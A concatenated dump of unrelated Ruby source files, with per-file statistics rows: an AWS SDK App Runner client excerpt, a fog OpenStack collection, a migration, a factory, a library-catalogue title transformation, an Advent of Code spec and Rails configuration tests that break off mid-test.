# value: "String", # required
# },
# code_configuration: {
# configuration_source: "REPOSITORY", # required, accepts REPOSITORY, API
# code_configuration_values: {
# runtime: "PYTHON_3", # required, accepts PYTHON_3, NODEJS_12
# build_command: "BuildCommand",
# start_command: "StartCommand",
# port: "String",
# runtime_environment_variables: {
# "RuntimeEnvironmentVariablesKey" => "RuntimeEnvironmentVariablesValue",
# },
# },
# },
# },
# image_repository: {
# image_identifier: "ImageIdentifier", # required
# image_configuration: {
# runtime_environment_variables: {
# "RuntimeEnvironmentVariablesKey" => "RuntimeEnvironmentVariablesValue",
# },
# start_command: "String",
# port: "String",
# },
# image_repository_type: "ECR", # required, accepts ECR, ECR_PUBLIC
# },
# auto_deployments_enabled: false,
# authentication_configuration: {
# connection_arn: "AppRunnerResourceArn",
# access_role_arn: "RoleArn",
# },
# },
# instance_configuration: {
# cpu: "Cpu",
# memory: "Memory",
# instance_role_arn: "RoleArn",
# },
# auto_scaling_configuration_arn: "AppRunnerResourceArn",
# health_check_configuration: {
# protocol: "TCP", # accepts TCP, HTTP
# path: "String",
# interval: 1,
# timeout: 1,
# healthy_threshold: 1,
# unhealthy_threshold: 1,
# },
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/UpdateService AWS API Documentation
#
# @overload update_service(params = {})
# @param [Hash] params ({})
def update_service(params = {}, options = {})
req = build_request(:update_service, params)
req.send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
def build_request(operation_name, params = {})
handlers = @handlers.for(operation_name)
context = Seahorse::Client::RequestContext.new(
operation_name: operation_name,
operation: config.api.operation(operation_name),
client: self,
params: params,
config: config)
context[:gem_name] = 'aws-sdk-apprunner'
context[:gem_version] = '1.2.0'
Seahorse::Client::Request.new(handlers, context)
end
# @api private
# @deprecated
def waiter_names
[]
end
class << self
# @api private
attr_reader :identifier
# @api private
def errors_module
Errors
end
end
end
end
| 50.735551 | 192 | 0.696654 |
08dce3d0e23156446d67261d8d12cd8a25bd4900 | 864 | require 'fog/openstack/models/collection'
require 'fog/identity/openstack/v3/models/policy'
module Fog
module Identity
class OpenStack
class V3
class Policies < Fog::OpenStack::Collection
model Fog::Identity::OpenStack::V3::Policy
def all(options = {})
load_response(service.list_policies(options), 'policies')
end
def find_by_id(id)
cached_policy = find { |policy| policy.id == id }
return cached_policy if cached_policy
policy_hash = service.get_policy(id).body['policy']
Fog::Identity::OpenStack::V3::Policy.new(
policy_hash.merge(:service => service)
)
end
def destroy(id)
policy = find_by_id(id)
policy.destroy
end
end
end
end
end
end
| 26.181818 | 69 | 0.577546 |
ff4c428acb689ba7c9c921205980c2132146ea93 | 293 | class CreateWeapons < ActiveRecord::Migration[6.0]
def change
create_table :weapons do |t|
t.string :name
t.string :weapon_category
t.string :weapon_range
t.string :url
t.references :equipment, foreign_key: true
t.timestamps
end
end
end
| 19.533333 | 50 | 0.645051 |
ac65674ed21e9770c61971f0a11d0b5e60b30a23 | 330 | FactoryBot.define do
factory :collection_type_participant, class: Hyrax::CollectionTypeParticipant do
association :hyrax_collection_type, factory: :collection_type
sequence(:agent_id) { |n| "user#{n}@example.com" }
agent_type { 'user' }
access { Hyrax::CollectionTypeParticipant::MANAGE_ACCESS }
end
end
| 36.666667 | 82 | 0.739394 |
ab98634f84b5dd362d3274c30fb9ca2d437050cd | 4,694 | require "metacrunch/hash"
require "metacrunch/transformator/transformation/step"
require_relative "../mab_to_primo"
require_relative "./helpers/datafield_089"
# Transformation step that derives a human-readable display title
# ("title_display") from MAB title datafields (310/331/334/335/403 plus
# the 089 volume field), combining the superordinate work ("Überordnung")
# and the work itself ("Werk") where both are present.
class Metacrunch::UBPB::Transformations::MabToPrimo::AddTitleDisplay < Metacrunch::Transformator::Transformation::Step
  include parent::Helpers::Datafield089

  # Adds the computed title to the target hash under "title_display";
  # without a target, simply returns the title string (or nil).
  def call
    target ? Metacrunch::Hash.add(target, "title_display", title_display) : title_display
  end

  private

  # Assembles the display title. Returns nil when neither a work title nor
  # a superordinate title is present; any "<<" / ">>" non-sorting markers
  # are stripped from the final string.
  def title_display
    # Work ("Werk"): prefer the normalized form (ind2 blank/1 of 310) over
    # the transcribed form (331).
    hauptsachtitel_des_werks_in_ansetzungsform = source.datafields("310", ind2: [:blank, "1"]).value
    hauptsachtitel_des_werks_in_vorlageform = source.datafields("331", ind2: [:blank, "1"]).value
    hauptsachtitel_des_werks = hauptsachtitel_des_werks_in_ansetzungsform || hauptsachtitel_des_werks_in_vorlageform
    allgemeine_materialbenennung_des_werks = source.datafields("334", ind2: [:blank, "1"]).value
    zusätze_zum_hauptsachtitel_des_werks = source.datafields("335", ind2: [:blank, "1"]).value
    bandangabe_des_werks = datafield_089.value

    # Superordinate work ("Überordnung"): same preference, ind2 == 2.
    hauptsachtitel_der_überordnung_in_ansetzungsform = source.datafields("310", ind2: "2").value
    hauptsachtitel_der_überordnung_in_vorlageform = source.datafields("331", ind2: "2").value
    hauptsachtitel_der_überordnung = hauptsachtitel_der_überordnung_in_ansetzungsform || hauptsachtitel_der_überordnung_in_vorlageform
    zusätze_zum_hauptsachtitel_der_überordnung = source.datafields("335", ind2: "2").value
    ausgabebezeichnung_der_überordnung = source.datafields("403", ind2: "2").value

    if hauptsachtitel_der_überordnung && hauptsachtitel_des_werks
      # Both present: "<superordinate> / <volume> : <work>".
      [].tap do |_result|
        _result << titel_factory(hauptsachtitel_der_überordnung, {
          zusätze_zum_hauptsachtitel: zusätze_zum_hauptsachtitel_der_überordnung
        })
        if bandangabe_des_werks
          # Skip the volume designation when the work is titled the same,
          # e.g. "Anleitungen eine Farbe zu lesen / <rot> : Rot".
          if bandangabe_des_werks.gsub(/<|>/, "").downcase != hauptsachtitel_des_werks.downcase
            _result << "/"
            _result << bandangabe_des_werks
          end
        end
        _result << ":"
        _result << titel_factory(hauptsachtitel_des_werks, {
          zusätze_zum_hauptsachtitel: zusätze_zum_hauptsachtitel_des_werks,
          allgemeine_materialbenennung: allgemeine_materialbenennung_des_werks
        })
      end.compact.join(" ")
    elsif !hauptsachtitel_der_überordnung && hauptsachtitel_des_werks
      # Only the work itself.
      titel_factory(hauptsachtitel_des_werks, {
        zusätze_zum_hauptsachtitel: zusätze_zum_hauptsachtitel_des_werks,
        bandangabe: bandangabe_des_werks,
        allgemeine_materialbenennung: allgemeine_materialbenennung_des_werks
      })
    elsif hauptsachtitel_der_überordnung && !hauptsachtitel_des_werks
      # Only the superordinate work, optionally followed by the volume.
      [].tap do |_result|
        _result << titel_factory(hauptsachtitel_der_überordnung, {
          zusätze_zum_hauptsachtitel: zusätze_zum_hauptsachtitel_der_überordnung,
          ausgabebezeichnung: ausgabebezeichnung_der_überordnung
        })
        _result << bandangabe_des_werks if bandangabe_des_werks
      end.compact.join(" ")
    end.try(:gsub, /<<|>>/, "")
  end

  # Formats a single title with its optional additions:
  #   "<title>. <subseries>: <subtitle> - <edition>: <volume> [<material/content types>]"
  # Returns nil when +hauptsachtitel+ is nil.
  def titel_factory(hauptsachtitel, options = {})
    ausgabebezeichnung = options[:ausgabebezeichnung]
    bandangabe = options[:bandangabe]
    zusätze_zum_hauptsachtitel = options[:zusätze_zum_hauptsachtitel]
    unterreihen = source.datafields("360", ind2: "1").subfields("a").values
    allgemeine_materialbenennung = options[:allgemeine_materialbenennung]
    arten_des_inhalts = source.get("Arten des Inhalts").map(&:get)
    erweiterte_datenträgertypen = source.get("erweiterte Datenträgertypen").map(&:get)

    if hauptsachtitel
      result = []
      # Append only subseries whose words do not already occur in the title.
      result << [
        hauptsachtitel,
        unterreihen.select do |unterreihe|
          unterreihe.split.none? do |string|
            hauptsachtitel.include?(string)
          end
        end
      ].flatten.compact.join(". ")

      if zusätze_zum_hauptsachtitel
        result << ": #{zusätze_zum_hauptsachtitel}"
      end
      if ausgabebezeichnung
        result << "- #{ausgabebezeichnung}"
      end
      if bandangabe
        result << ": #{bandangabe}"
      end

      # Material designation, content types and carrier types are merged
      # into one bracketed, de-duplicated suffix (nil when all are empty).
      additions = [
        allgemeine_materialbenennung,
        arten_des_inhalts,
        erweiterte_datenträgertypen
      ].flatten.compact.uniq.join(", ").presence

      if additions
        result << "[#{additions}]"
      end

      result.join(" ")
    end
  end

  # References
  # - http://www.payer.de/rakwb/rakwb00.htm
end
| 34.014493 | 134 | 0.696847 |
b99220822dfaa204c1407251aa4de0c0705ecb44 | 168 | class UpdateInUseToolsToVersion2 < ActiveRecord::Migration[5.1]
safety_assured
def change
update_view :in_use_tools, version: 2, revert_to_version: 1
end
end
| 24 | 63 | 0.785714 |
0899ebfe076e086b1e887a8e1f5f4a3e159fdadf | 884 | # frozen_string_literal: true
require './lib/day_20'
RSpec.describe 'Day 20: Jurassic Jigsaw' do
  # Mutable arrays that the before-hooks fill with input lines.
  let(:test_data) do
    []
  end
  let(:fixture) { File.join fixtures_path, 'day_20.data' }
  let(:fixture_data) { [] }
  before do
    # Load the puzzle input, one chomped line per array element.
    File.readlines(fixture).each do |line|
      fixture_data << line.chomp
    end
  end
  context 'Examples' do
    # The worked example from the puzzle statement uses its own fixture.
    let(:test_fixture) { File.join fixtures_path, 'day_20_test.data' }
    let(:model) { Day20.new test_data }
    before do
      File.readlines(test_fixture).each do |line|
        test_data << line.chomp
      end
    end
    it 'locates corner tiles of assembled image' do
      expect(model.exercise1).to eq 20899048083289
    end
  end
  context 'Exercises' do
    let(:model) { Day20.new fixture_data }
    it 'locates corner tiles of assembled image' do
      expect(model.exercise1).to eq 111936085519519
    end
  end
end
| 21.560976 | 70 | 0.664027 |
03e38c8e5b7ebaca09abe34e14e4ee78b9d68ef7 | 79,494 | # frozen_string_literal: true
require "isolation/abstract_unit"
require "rack/test"
require "env_helpers"
require "set"
# Stand-in mailer interceptor/observer classes used by the configuration
# tests; each callback simply returns the email it receives.
class ::MyMailInterceptor
  def self.delivering_email(email)
    email
  end
end

class ::MyOtherMailInterceptor < ::MyMailInterceptor; end

class ::MyPreviewMailInterceptor
  def self.previewing_email(email)
    email
  end
end

class ::MyOtherPreviewMailInterceptor < ::MyPreviewMailInterceptor; end

class ::MyMailObserver
  def self.delivered_email(email)
    email
  end
end

class ::MyOtherMailObserver < ::MyMailObserver; end
module ApplicationTests
class ConfigurationTest < ActiveSupport::TestCase
include ActiveSupport::Testing::Isolation
include Rack::Test::Methods
include EnvHelpers
def new_app
File.expand_path("#{app_path}/../new_app")
end
def copy_app
FileUtils.cp_r(app_path, new_app)
end
def app(env = "development")
@app ||= begin
ENV["RAILS_ENV"] = env
require "#{app_path}/config/environment"
Rails.application
ensure
ENV.delete "RAILS_ENV"
end
end
def setup
build_app
suppress_default_config
end
def teardown
teardown_app
FileUtils.rm_rf(new_app) if File.directory?(new_app)
end
def suppress_default_config
FileUtils.mv("#{app_path}/config/environments", "#{app_path}/config/__environments__")
end
def restore_default_config
FileUtils.rm_rf("#{app_path}/config/environments")
FileUtils.mv("#{app_path}/config/__environments__", "#{app_path}/config/environments")
end
test "Rails.env does not set the RAILS_ENV environment variable which would leak out into rake tasks" do
require "rails"
switch_env "RAILS_ENV", nil do
Rails.env = "development"
assert_equal "development", Rails.env
assert_nil ENV["RAILS_ENV"]
end
end
test "Rails.env falls back to development if RAILS_ENV is blank and RACK_ENV is nil" do
with_rails_env("") do
assert_equal "development", Rails.env
end
end
test "Rails.env falls back to development if RACK_ENV is blank and RAILS_ENV is nil" do
with_rack_env("") do
assert_equal "development", Rails.env
end
end
test "By default logs tags are not set in development" do
restore_default_config
with_rails_env "development" do
app "development"
assert_predicate Rails.application.config.log_tags, :blank?
end
end
test "By default logs are tagged with :request_id in production" do
restore_default_config
with_rails_env "production" do
app "production"
assert_equal [:request_id], Rails.application.config.log_tags
end
end
test "lib dir is on LOAD_PATH during config" do
app_file "lib/my_logger.rb", <<-RUBY
require "logger"
class MyLogger < ::Logger
end
RUBY
add_to_top_of_config <<-RUBY
require "my_logger"
config.logger = MyLogger.new STDOUT
RUBY
app "development"
assert_equal "MyLogger", Rails.application.config.logger.class.name
end
test "raises an error if cache does not support recyclable cache keys" do
build_app(initializers: true)
add_to_env_config "production", "config.cache_store = Class.new {}.new"
add_to_env_config "production", "config.active_record.cache_versioning = true"
error = assert_raise(RuntimeError) do
app "production"
end
assert_match(/You're using a cache/, error.message)
end
test "a renders exception on pending migration" do
add_to_config <<-RUBY
config.active_record.migration_error = :page_load
config.consider_all_requests_local = true
config.action_dispatch.show_exceptions = true
RUBY
app_file "db/migrate/20140708012246_create_user.rb", <<-RUBY
class CreateUser < ActiveRecord::Migration::Current
def change
create_table :users
end
end
RUBY
app "development"
ActiveRecord::Migrator.migrations_paths = ["#{app_path}/db/migrate"]
begin
get "/foo"
assert_equal 500, last_response.status
assert_match "ActiveRecord::PendingMigrationError", last_response.body
ensure
ActiveRecord::Migrator.migrations_paths = nil
end
end
test "Rails.groups returns available groups" do
require "rails"
Rails.env = "development"
assert_equal [:default, "development"], Rails.groups
assert_equal [:default, "development", :assets], Rails.groups(assets: [:development])
assert_equal [:default, "development", :another, :assets], Rails.groups(:another, assets: %w(development))
Rails.env = "test"
assert_equal [:default, "test"], Rails.groups(assets: [:development])
ENV["RAILS_GROUPS"] = "javascripts,stylesheets"
assert_equal [:default, "test", "javascripts", "stylesheets"], Rails.groups
end
test "Rails.application is nil until app is initialized" do
require "rails"
assert_nil Rails.application
app "development"
assert_equal AppTemplate::Application.instance, Rails.application
end
test "Rails.application responds to all instance methods" do
app "development"
assert_equal Rails.application.routes_reloader, AppTemplate::Application.routes_reloader
end
test "Rails::Application responds to paths" do
app "development"
assert_equal ["#{app_path}/app/views"], AppTemplate::Application.paths["app/views"].expanded
end
test "the application root is set correctly" do
app "development"
assert_equal Pathname.new(app_path), Rails.application.root
end
test "the application root can be seen from the application singleton" do
app "development"
assert_equal Pathname.new(app_path), AppTemplate::Application.root
end
test "the application root can be set" do
copy_app
add_to_config <<-RUBY
config.root = '#{new_app}'
RUBY
use_frameworks []
app "development"
assert_equal Pathname.new(new_app), Rails.application.root
end
test "the application root is Dir.pwd if there is no config.ru" do
File.delete("#{app_path}/config.ru")
use_frameworks []
Dir.chdir("#{app_path}") do
app "development"
assert_equal Pathname.new("#{app_path}"), Rails.application.root
end
end
test "Rails.root should be a Pathname" do
add_to_config <<-RUBY
config.root = "#{app_path}"
RUBY
app "development"
assert_instance_of Pathname, Rails.root
end
test "Rails.public_path should be a Pathname" do
add_to_config <<-RUBY
config.paths["public"] = "somewhere"
RUBY
app "development"
assert_instance_of Pathname, Rails.public_path
end
test "does not eager load controller actions in development" do
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ActionController::Base
def index;end
def show;end
end
RUBY
app "development"
assert_nil PostsController.instance_variable_get(:@action_methods)
end
test "eager loads controller actions in production" do
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ActionController::Base
def index;end
def show;end
end
RUBY
add_to_config <<-RUBY
config.eager_load = true
config.cache_classes = true
RUBY
app "production"
assert_equal %w(index show).to_set, PostsController.instance_variable_get(:@action_methods)
end
test "does not eager load mailer actions in development" do
app_file "app/mailers/posts_mailer.rb", <<-RUBY
class PostsMailer < ActionMailer::Base
def noop_email;end
end
RUBY
app "development"
assert_nil PostsMailer.instance_variable_get(:@action_methods)
end
test "eager loads mailer actions in production" do
app_file "app/mailers/posts_mailer.rb", <<-RUBY
class PostsMailer < ActionMailer::Base
def noop_email;end
end
RUBY
add_to_config <<-RUBY
config.eager_load = true
config.cache_classes = true
RUBY
app "production"
assert_equal %w(noop_email).to_set, PostsMailer.instance_variable_get(:@action_methods)
end
# Active Record attribute methods (e.g. Post#title) should only be defined at
# boot when the app is eager loaded AND the schema cache is populated;
# otherwise they are defined lazily on first use.
test "does not eager load attribute methods in development" do
  app_file "app/models/post.rb", <<-RUBY
    class Post < ActiveRecord::Base
    end
  RUBY
  app_file "config/initializers/active_record.rb", <<-RUBY
    ActiveRecord::Base.establish_connection(adapter: "sqlite3", database: ":memory:")
    ActiveRecord::Migration.verbose = false
    ActiveRecord::Schema.define(version: 1) do
      create_table :posts do |t|
        t.string :title
      end
    end
  RUBY
  app "development"
  # Lazy mode: the reader has not been defined at boot time.
  assert_not_includes Post.instance_methods, :title
end
test "does not eager load attribute methods in production when the schema cache is empty" do
  app_file "app/models/post.rb", <<-RUBY
    class Post < ActiveRecord::Base
    end
  RUBY
  app_file "config/initializers/active_record.rb", <<-RUBY
    ActiveRecord::Base.establish_connection(adapter: "sqlite3", database: ":memory:")
    ActiveRecord::Migration.verbose = false
    ActiveRecord::Schema.define(version: 1) do
      create_table :posts do |t|
        t.string :title
      end
    end
  RUBY
  add_to_config <<-RUBY
    config.eager_load = true
    config.cache_classes = true
  RUBY
  app "production"
  # Even eager loaded, an empty schema cache means no ahead-of-time readers.
  assert_not_includes Post.instance_methods, :title
end
test "eager loads attribute methods in production when the schema cache is populated" do
  app_file "app/models/post.rb", <<-RUBY
    class Post < ActiveRecord::Base
    end
  RUBY
  app_file "config/initializers/active_record.rb", <<-RUBY
    ActiveRecord::Base.establish_connection(adapter: "sqlite3", database: ":memory:")
    ActiveRecord::Migration.verbose = false
    ActiveRecord::Schema.define(version: 1) do
      create_table :posts do |t|
        t.string :title
      end
    end
  RUBY
  add_to_config <<-RUBY
    config.eager_load = true
    config.cache_classes = true
  RUBY
  # Seed the schema cache so define_attribute_methods can run at boot.
  app_file "config/initializers/schema_cache.rb", <<-RUBY
    ActiveRecord::Base.connection.schema_cache.add("posts")
  RUBY
  app "production"
  assert_includes Post.instance_methods, :title
end
test "does not attempt to eager load attribute methods for models that aren't connected" do
  app_file "app/models/post.rb", <<-RUBY
    class Post < ActiveRecord::Base
    end
  RUBY
  app_file "config/initializers/active_record.rb", <<-RUBY
    ActiveRecord::Base.establish_connection(adapter: "sqlite3", database: ":memory:")
    ActiveRecord::Migration.verbose = false
    ActiveRecord::Schema.define(version: 1) do
      create_table :posts do |t|
        t.string :title
      end
    end
  RUBY
  add_to_config <<-RUBY
    config.eager_load = true
    config.cache_classes = true
  RUBY
  # Comment points at a database that does not exist; boot must not try to
  # connect to it just to define attribute methods.
  app_file "app/models/comment.rb", <<-RUBY
    class Comment < ActiveRecord::Base
      establish_connection(adapter: "mysql2", database: "does_not_exist")
    end
  RUBY
  assert_nothing_raised do
    app "production"
  end
end
# Eager-loading boot behavior.
test "initialize an eager loaded, cache classes app" do
  add_to_config <<-RUBY
    config.eager_load = true
    config.cache_classes = true
  RUBY
  app "development"
  # cache_classes switches autoloading to plain `require`.
  assert_equal :require, ActiveSupport::Dependencies.mechanism
end
test "application is always added to eager_load namespaces" do
  app "development"
  assert_includes Rails.application.config.eager_load_namespaces, AppTemplate::Application
end
test "the application can be eager loaded even when there are no frameworks" do
  # Strip out every framework-dependent file the app template generated.
  FileUtils.rm_rf("#{app_path}/app/jobs/application_job.rb")
  FileUtils.rm_rf("#{app_path}/app/models/application_record.rb")
  FileUtils.rm_rf("#{app_path}/app/mailers/application_mailer.rb")
  FileUtils.rm_rf("#{app_path}/config/environments")
  add_to_config <<-RUBY
    config.eager_load = true
    config.cache_classes = true
  RUBY
  use_frameworks []
  assert_nothing_raised do
    app "development"
  end
end
# config.filter_parameters accepts symbols, strings and lambdas.
test "filter_parameters should be able to set via config.filter_parameters" do
  add_to_config <<-RUBY
    config.filter_parameters += [ :foo, 'bar', lambda { |key, value|
      value = value.reverse if /baz/.match?(key)
    }]
  RUBY
  assert_nothing_raised do
    app "development"
  end
end
test "filter_parameters should be able to set via config.filter_parameters in an initializer" do
  app_file "config/initializers/filter_parameters_logging.rb", <<-RUBY
    Rails.application.config.filter_parameters += [ :password, :foo, 'bar' ]
  RUBY
  app "development"
  # The filters end up in the Rack env config used by ActionDispatch.
  assert_equal [:password, :foo, "bar"], Rails.application.env_config["action_dispatch.parameter_filter"]
end
test "config.to_prepare is forwarded to ActionDispatch" do
  # Global flag flipped by the to_prepare callback on first request cycle.
  $prepared = false
  add_to_config <<-RUBY
    config.to_prepare do
      $prepared = true
    end
  RUBY
  assert_not $prepared
  app "development"
  get "/"
  assert $prepared
end
# Asserts that both the process-wide default external and internal
# encodings are UTF-8 (checked in that order).
def assert_utf8
  [Encoding.default_external, Encoding.default_internal].each do |encoding|
    assert_equal Encoding::UTF_8, encoding
  end
end
# Default and explicit encoding configuration, plus public path mapping.
test "skipping config.encoding still results in 'utf-8' as the default" do
  app "development"
  assert_utf8
end
test "config.encoding sets the default encoding" do
  add_to_config <<-RUBY
    config.encoding = "utf-8"
  RUBY
  app "development"
  assert_utf8
end
test "config.paths.public sets Rails.public_path" do
  add_to_config <<-RUBY
    config.paths["public"] = "somewhere"
  RUBY
  app "development"
  # Relative paths are resolved against the application root.
  assert_equal Pathname.new(app_path).join("somewhere"), Rails.public_path
end
# Production defaults driven by environment variables.
test "In production mode, config.public_file_server.enabled is off by default" do
  restore_default_config
  with_rails_env "production" do
    app "production"
    assert_not app.config.public_file_server.enabled
  end
end
test "In production mode, config.public_file_server.enabled is enabled when RAILS_SERVE_STATIC_FILES is set" do
  restore_default_config
  with_rails_env "production" do
    switch_env "RAILS_SERVE_STATIC_FILES", "1" do
      app "production"
      assert app.config.public_file_server.enabled
    end
  end
end
test "In production mode, STDOUT logging is enabled when RAILS_LOG_TO_STDOUT is set" do
  restore_default_config
  with_rails_env "production" do
    switch_env "RAILS_LOG_TO_STDOUT", "1" do
      app "production"
      assert ActiveSupport::Logger.logger_outputs_to?(app.config.logger, STDOUT)
    end
  end
end
test "In production mode, config.public_file_server.enabled is disabled when RAILS_SERVE_STATIC_FILES is blank" do
  restore_default_config
  with_rails_env "production" do
    # A whitespace-only value counts as blank and must not enable the server.
    switch_env "RAILS_SERVE_STATIC_FILES", " " do
      app "production"
      assert_not app.config.public_file_server.enabled
    end
  end
end
# Signed cookies must be verifiable with a key derived from secret_key_base
# via the application's key generator.
test "Use key_generator when secret_key_base is set" do
  make_basic_app do |application|
    application.secrets.secret_key_base = "b3c631c314c0bbca50c1b2843150fe33"
    application.config.session_store :disabled
  end
  class ::OmgController < ActionController::Base
    def index
      cookies.signed[:some_key] = "some_value"
      render plain: cookies[:some_key]
    end
  end
  get "/"
  # Re-derive the cookie key and verify the value the controller emitted.
  secret = app.key_generator.generate_key("signed cookie")
  verifier = ActiveSupport::MessageVerifier.new(secret)
  assert_equal "some_value", verifier.verify(last_response.body)
end
# Rails.application.message_verifier(:name) is stable across lookups and
# equivalent to a hand-built verifier using the same derived key.
test "application verifier can be used in the entire application" do
  make_basic_app do |application|
    application.secrets.secret_key_base = "b3c631c314c0bbca50c1b2843150fe33"
    application.config.session_store :disabled
  end
  message = app.message_verifier(:sensitive_value).generate("some_value")
  assert_equal "some_value", Rails.application.message_verifier(:sensitive_value).verify(message)
  secret = app.key_generator.generate_key("sensitive_value")
  verifier = ActiveSupport::MessageVerifier.new(secret)
  assert_equal "some_value", verifier.verify(message)
end
# secret_key_base fallback behavior: generated into tmp/ in development,
# required (boot failure) in production.
test "application will generate secret_key_base in tmp file if blank in development" do
  app_file "config/initializers/secret_token.rb", <<-RUBY
    Rails.application.credentials.secret_key_base = nil
  RUBY
  # For test that works even if tmp dir does not exist.
  Dir.chdir(app_path) { FileUtils.remove_dir("tmp") }
  app "development"
  assert_not_nil app.secrets.secret_key_base
  assert File.exist?(app_path("tmp/development_secret.txt"))
end
test "application will not generate secret_key_base in tmp file if blank in production" do
  app_file "config/initializers/secret_token.rb", <<-RUBY
    Rails.application.credentials.secret_key_base = nil
  RUBY
  assert_raises ArgumentError do
    app "production"
  end
end
test "raises when secret_key_base is blank" do
  app_file "config/initializers/secret_token.rb", <<-RUBY
    Rails.application.credentials.secret_key_base = nil
  RUBY
  error = assert_raise(ArgumentError) do
    app "production"
  end
  assert_match(/Missing `secret_key_base`./, error.message)
end
test "raise when secret_key_base is not a type of string" do
  add_to_config <<-RUBY
    Rails.application.credentials.secret_key_base = 123
  RUBY
  assert_raise(ArgumentError) do
    app "production"
  end
end
# Verifiers for different names must not accept each other's messages, and
# the same name must return a memoized (identical) verifier object.
test "application verifier can build different verifiers" do
  make_basic_app do |application|
    application.config.session_store :disabled
  end
  default_verifier = app.message_verifier(:sensitive_value)
  text_verifier = app.message_verifier(:text)
  message = text_verifier.generate("some_value")
  assert_equal "some_value", text_verifier.verify(message)
  assert_raises ActiveSupport::MessageVerifier::InvalidSignature do
    default_verifier.verify(message)
  end
  assert_equal default_verifier.object_id, app.message_verifier(:sensitive_value).object_id
  assert_not_equal default_verifier.object_id, text_verifier.object_id
end
# config/secrets.yml loading: per-environment keys, custom keys, the shared:
# section, and tolerance of an empty file.
test "secrets.secret_key_base is used when config/secrets.yml is present" do
  app_file "config/secrets.yml", <<-YAML
    development:
      secret_key_base: 3b7cd727ee24e8444053437c36cc66c3
  YAML
  app "development"
  assert_equal "3b7cd727ee24e8444053437c36cc66c3", app.secrets.secret_key_base
  assert_equal "3b7cd727ee24e8444053437c36cc66c3", app.secret_key_base
end
test "secret_key_base is copied from config to secrets when not set" do
  remove_file "config/secrets.yml"
  app_file "config/initializers/secret_token.rb", <<-RUBY
    Rails.application.config.secret_key_base = "3b7cd727ee24e8444053437c36cc66c3"
  RUBY
  app "development"
  assert_equal "3b7cd727ee24e8444053437c36cc66c3", app.secrets.secret_key_base
end
test "custom secrets saved in config/secrets.yml are loaded in app secrets" do
  app_file "config/secrets.yml", <<-YAML
    development:
      secret_key_base: 3b7cd727ee24e8444053437c36cc66c3
      aws_access_key_id: myamazonaccesskeyid
      aws_secret_access_key: myamazonsecretaccesskey
  YAML
  app "development"
  assert_equal "myamazonaccesskeyid", app.secrets.aws_access_key_id
  assert_equal "myamazonsecretaccesskey", app.secrets.aws_secret_access_key
end
test "shared secrets saved in config/secrets.yml are loaded in app secrets" do
  app_file "config/secrets.yml", <<-YAML
    shared:
      api_key: 3b7cd727
  YAML
  app "development"
  assert_equal "3b7cd727", app.secrets.api_key
end
test "shared secrets will yield to environment specific secrets" do
  app_file "config/secrets.yml", <<-YAML
    shared:
      api_key: 3b7cd727
    development:
      api_key: abc12345
  YAML
  app "development"
  # Environment-specific value wins over shared.
  assert_equal "abc12345", app.secrets.api_key
end
test "blank config/secrets.yml does not crash the loading process" do
  app_file "config/secrets.yml", <<-YAML
  YAML
  app "development"
  assert_nil app.secrets.not_defined
end
test "config.secret_key_base over-writes a blank secrets.secret_key_base" do
  app_file "config/initializers/secret_token.rb", <<-RUBY
    Rails.application.config.secret_key_base = "iaminallyoursecretkeybase"
  RUBY
  # secrets.yml deliberately leaves the key blank.
  app_file "config/secrets.yml", <<-YAML
    development:
      secret_key_base:
  YAML
  app "development"
  assert_equal "iaminallyoursecretkeybase", app.secrets.secret_key_base
end
# Deeply nested hashes loaded from secrets.yml must have symbol keys at
# every level, not just the top.
test "that nested keys are symbolized the same as parents for hashes more than one level deep" do
  app_file "config/secrets.yml", <<-YAML
    development:
      smtp_settings:
        address: "smtp.example.com"
        user_name: "[email protected]"
        password: "697361616320736c6f616e2028656c6f7265737429"
  YAML
  app "development"
